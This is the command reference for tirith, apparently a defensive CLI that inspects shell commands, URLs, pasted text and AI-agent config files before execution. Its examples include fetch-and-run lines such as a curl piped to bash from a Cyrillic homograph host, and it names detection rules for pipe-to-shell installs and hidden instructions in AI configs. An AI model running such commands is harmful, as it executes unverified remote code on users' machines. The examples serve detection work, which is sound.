Commands

Complete reference for all tirith CLI commands.

Exit Codes#

0Allow — no issues found
1Block — high/critical severity findings
2Warn — medium/low severity findings
3Warn-ack — acknowledgement required (shell-hook strict-warn protocol)

COREDetection & Analysis#

tirith check -- <cmd>

Analyze a command without executing it. Useful for testing what tirith would flag.

shell
$ tirith check -- curl -sSL https://іnstall.example-clі.dev | bash
shell
tirith: BLOCKED
[CRITICAL] non_ascii_hostname — Cyrillic і (U+0456) in hostname
This is a homograph attack. The URL visually mimics a legitimate
domain but resolves to a completely different server.
Bypass: prefix your command with TIRITH=0 (applies to that command only)

Supports --json, --non-interactive, --shell, and --suggest-safe-command (adds a concrete safer rewrite).

tirith paste

Reads from stdin and analyzes pasted content for ANSI escapes, bidi controls, zero-width characters, and hidden content. The shell hook calls this automatically when you paste into the terminal.

shell
$ echo 'some content' | tirith paste

tirith score <url>

Breaks down a URL's trust signals — TLS, domain age heuristics, known shorteners, Unicode analysis.

shell
$ tirith score https://bit.ly/something
$ tirith score https://example.com --explain # factor-by-factor derivation

tirith diff <url>

Byte-level comparison showing exactly where suspicious characters are hiding.

shell
$ tirith diff https://exаmple.com
shell
Position 3: expected 0x61 (Latin a) | got 0xd0 0xb0 (Cyrillic а)

tirith why

Explains the last rule that triggered — what it detected, why it matters, and what to do about it.

shell
$ tirith why

tirith explain --rule <id>

Show documentation, examples, and remediation for any detection rule. Every Rule ID on the Detection Rules page works here.

shell
$ tirith explain --rule pipe_to_interpreter
$ tirith explain --rule non_ascii_hostname --fix # remediation only

Pair with the Detection Rules reference to look up any of the 200+ rule IDs.

SAFESafe Execution#

tirith run <url>

Safe replacement for curl | bash. Downloads to a temp file, shows SHA256, runs static analysis, opens in a pager for review, and executes only after you confirm. Creates a receipt for later verification.

shell
$ tirith run https://get.docker.com

tirith receipt {last,list,verify}

Track and verify scripts you've run through tirith run. Each execution creates a receipt with the script's SHA256 hash for auditing.

shell
$ tirith receipt last # show the most recent receipt
$ tirith receipt list # list all receipts
$ tirith receipt verify <sha256> # verify a specific receipt

tirith checkpoint {create,list,restore,diff,purge}

Snapshot files before risky operations, then roll back if something goes wrong.

shell
$ tirith checkpoint create ~/.bashrc ~/.zshrc # snapshot before changes
$ tirith checkpoint list # list all checkpoints
$ tirith checkpoint diff <id> # show what changed
$ tirith checkpoint restore <id> # roll back
$ tirith checkpoint purge # clean up old checkpoints

SCANScanning & Detection#

tirith scan [path]

Scan files and directories for hidden content, config poisoning, invisible Unicode, and MCP configuration issues. Supports SARIF output for CI integration.

shell
$ tirith scan . # scan current directory
$ tirith scan --file .cursorrules # scan a specific file
$ tirith scan --ci --fail-on high # exit non-zero if findings meet threshold
$ tirith scan --sarif # SARIF 2.1.0 output for CI tools

Prioritizes and scans 50+ known AI config file patterns including .cursorrules, CLAUDE.md, .mcp.json, and more.

tirith fetch <url>

Check a URL for server-side cloaking — detects when a server returns different content to AI bots vs browsers. Compares responses across 6 user-agents (Chrome, ClaudeBot, ChatGPT-User, PerplexityBot, Googlebot, curl).

shell
$ tirith fetch https://example.com/install.sh

AIAI Agent Security#

tirith ai {scan,diff,quarantine,explain-config,snapshot}

Inspect AI agent config files (CLAUDE.md, .cursorrules, agent/skill definitions) for drift. snapshot records a baseline; diff flags hidden-instruction additions and tool-use escalations against it; quarantine isolates a suspect file (copies by default — --move to relocate).

shell
$ tirith ai snapshot # record a baseline of AI configs
$ tirith ai scan # scan AI configs for hidden content
$ tirith ai diff CLAUDE.md # what changed since the snapshot
$ tirith ai explain-config .cursorrules
$ tirith ai quarantine suspect.md # copy aside (use --move to relocate)

Drift rules (ai_config_hidden_instruction_added, ai_config_tool_use_escalation) are diff-triggered — they need a snapshot and don't fire on a single buffer.

tirith lsp

Run tirith as a Language Server (LSP) over stdio for editor integration. Publishes diagnostics as you open and edit AI configs, install docs, and source files — picking a per-file-type analysis profile automatically.

shell
$ tirith lsp

Powers the editor experience — see the IDE & Editors guide for VS Code / JetBrains setup.

tirith mcp-server

Run tirith as an MCP server over JSON-RPC stdio. Provides 7 security tools that AI coding agents can call on demand.

shell
$ tirith mcp-server

See the MCP Integration docs for per-tool setup guides.

tirith gateway {run,validate-config}

MCP gateway proxy that intercepts AI agent shell tool calls for security analysis before execution.

shell
$ tirith gateway run --upstream-bin npx --upstream-arg mcp-server --config gateway.yaml
$ tirith gateway validate-config --config gateway.yaml

tirith setup <tool>

One-command setup for AI coding tools. Configures shell hooks, MCP server registration, and zshenv guards.

shell
$ tirith setup claude-code --with-mcp # Claude Code + MCP server
$ tirith setup codex # OpenAI Codex
$ tirith setup cursor # Cursor
$ tirith setup vscode # VS Code
$ tirith setup windsurf # Windsurf

POLICYPolicy & Trust#

tirith onboard

Detect your repo and environment (shell, IDE configs, AI-config files, package managers on PATH, lockfiles, CI, MCP configs, tirith install state) and recommend a shipping policy template. Read-only by default.

shell
$ tirith onboard # print recommendation
$ tirith onboard --ai-agent-heavy --json
$ tirith onboard --apply # interactive, per-step confirmation

--apply refuses to run non-interactively and never overwrites an existing policy without consent.

tirith policy {init,validate,test,tune}

Generate and manage your .tirith/policy.yaml. init scaffolds a starter policy (with --template presets); validate checks syntax/schema/conflicts; test dry-runs a command or file with a match trace; tune --from-audit suggests conservative adjustments from your audit log (suggest-only).

shell
$ tirith policy init --template startup # 7 presets + personal alias
$ tirith policy validate
$ tirith policy test "curl https://x.sh | bash"
$ tirith policy tune --from-audit

Templates: individual (alias personal), ci-strict, ai-agent-heavy, oss-maintainer, startup, enterprise, mcp-strict. See Configuration for details.

tirith rule {test,validate,explain}

Author and check custom detection rules — either a regex custom_rule or a semantic when: DSL (all/any/not over 13 predicates). A rule is regex XOR DSL.

shell
$ tirith rule validate .tirith/rules/my-rule.yaml
$ tirith rule test .tirith/rules/my-rule.yaml -- "git push --force"
$ tirith rule explain my_rule_id

validate rejects a DSL rule whose predicates don't map to its declared context, so a rule can't be silently dead. See the Policy Reference for the DSL.

tirith trust {add,list,explain,diff,remove,gc}

Manage trusted patterns without hand-editing policy YAML. Trust is narrow and expiring by default — entries are scoped tightly and expire after 30 days unless you opt out. Broad scopes (domain / wildcard / bare-TLD) require --broad.

shell
$ tirith trust add raw.githubusercontent.com/org/repo/main/get.sh
$ tirith trust add get.docker.com --broad --rule curl_pipe_shell
$ tirith trust list # scope class per entry
$ tirith trust explain example.com # coverage, expiry, reason
$ tirith trust gc --expired

INTELThreat Intelligence#

tirith threat-db {update,status,explain,sources,health,diff}

Manage the signed local threat database (malicious packages, hostnames, and IPs). Verified on download and load. Every subcommand supports --format json; threatdb works as an alias.

shell
$ tirith threat-db update # download + verify the signed DB
$ tirith threat-db status # age, signature, version, counts
$ tirith threat-db health # install, signature, staleness
$ tirith threat-db explain react # what the DB knows about an indicator
$ tirith threat-db sources # every feed the DB is built from
$ tirith threat-db diff --since 2026-01-01

By default, shell hooks and tirith check trigger a cheap background refresh at most once every 24h. Suppress per-invocation with --offline or TIRITH_OFFLINE=1.

MGMTManagement & Diagnostics#

tirith init

Prints the shell hook for your current shell. Add the eval line to your shell profile to activate tirith.

shell
$ eval "$(tirith init --shell zsh)" # in ~/.zshrc
$ eval "$(tirith init --shell bash)" # in ~/.bashrc
$ tirith init --shell fish | source # in ~/.config/fish/config.fish

tirith doctor

Diagnostic check — shows detected shell, hook status, policy file location, and configuration. Run this if something isn't working.

shell
$ tirith doctor # full diagnostics
$ tirith doctor --quick # fast, read-only status (editors poll this)
$ tirith doctor --fix # auto-fix hooks, policy, AI tool setup
$ tirith doctor --compat # shell/terminal compatibility report

--quick emits only {schema_version, protection_mode, policy_path_used, hook_active}, skipping the expensive probes.

tirith dashboard {export,serve}

Build a local security dashboard from your audit log. Export-by-default writes a self-contained static HTML file (mode 0600). The opt-in serve binds 127.0.0.1 only, with an ephemeral in-memory token (TTL ≤ 1h, never written to disk).

shell
$ tirith dashboard export --out dashboard.html
$ tirith dashboard serve # loopback-only, token-gated

Zero telemetry, zero network beyond the bound loopback port. Every interpolated value is HTML-escaped.

tirith warnings

Show accumulated session warnings and suggested trust entries. On shell exit, a one-line summary is printed if any warnings were recorded.

shell
$ tirith warnings # table of session warnings
$ tirith warnings --format json
$ tirith warnings --clear
$ tirith warnings --summary # one-liner for shell exit hooks

tirith audit {export,stats,report}

Audit log management for compliance and analysis.

shell
$ tirith audit export --format csv --since 2025-01-01
$ tirith audit stats --json
$ tirith audit report --format html --since 2025-01-01

tirith update

Update tirith to the latest release. Defers to your package manager for PM installs; uses an atomic verified self-replace for install.sh / standalone installs.

shell
$ tirith update
$ tirith update --dry-run
$ tirith update --verify
$ tirith update --rollback

tirith verify-self

Verify the running binary is the genuine, unmodified official release (checksum + cosign signature). Reports honestly when it cannot verify.

shell
$ tirith verify-self

tirith version --provenance

Show version, build info, detected install method, and verification status.

shell
$ tirith version --provenance

tirith daemon start

Start a background daemon for faster checks and warm threat-intel enrichment (Unix). Opt-in — tirith otherwise runs per-command and exits immediately.

shell
$ tirith daemon start

tirith activate <key>

Activate a license key for Team/Enterprise features.

shell
$ tirith activate <your-signed-token>

tirith license

Show or manage license status. Subcommands: deactivate, refresh.

shell
$ tirith license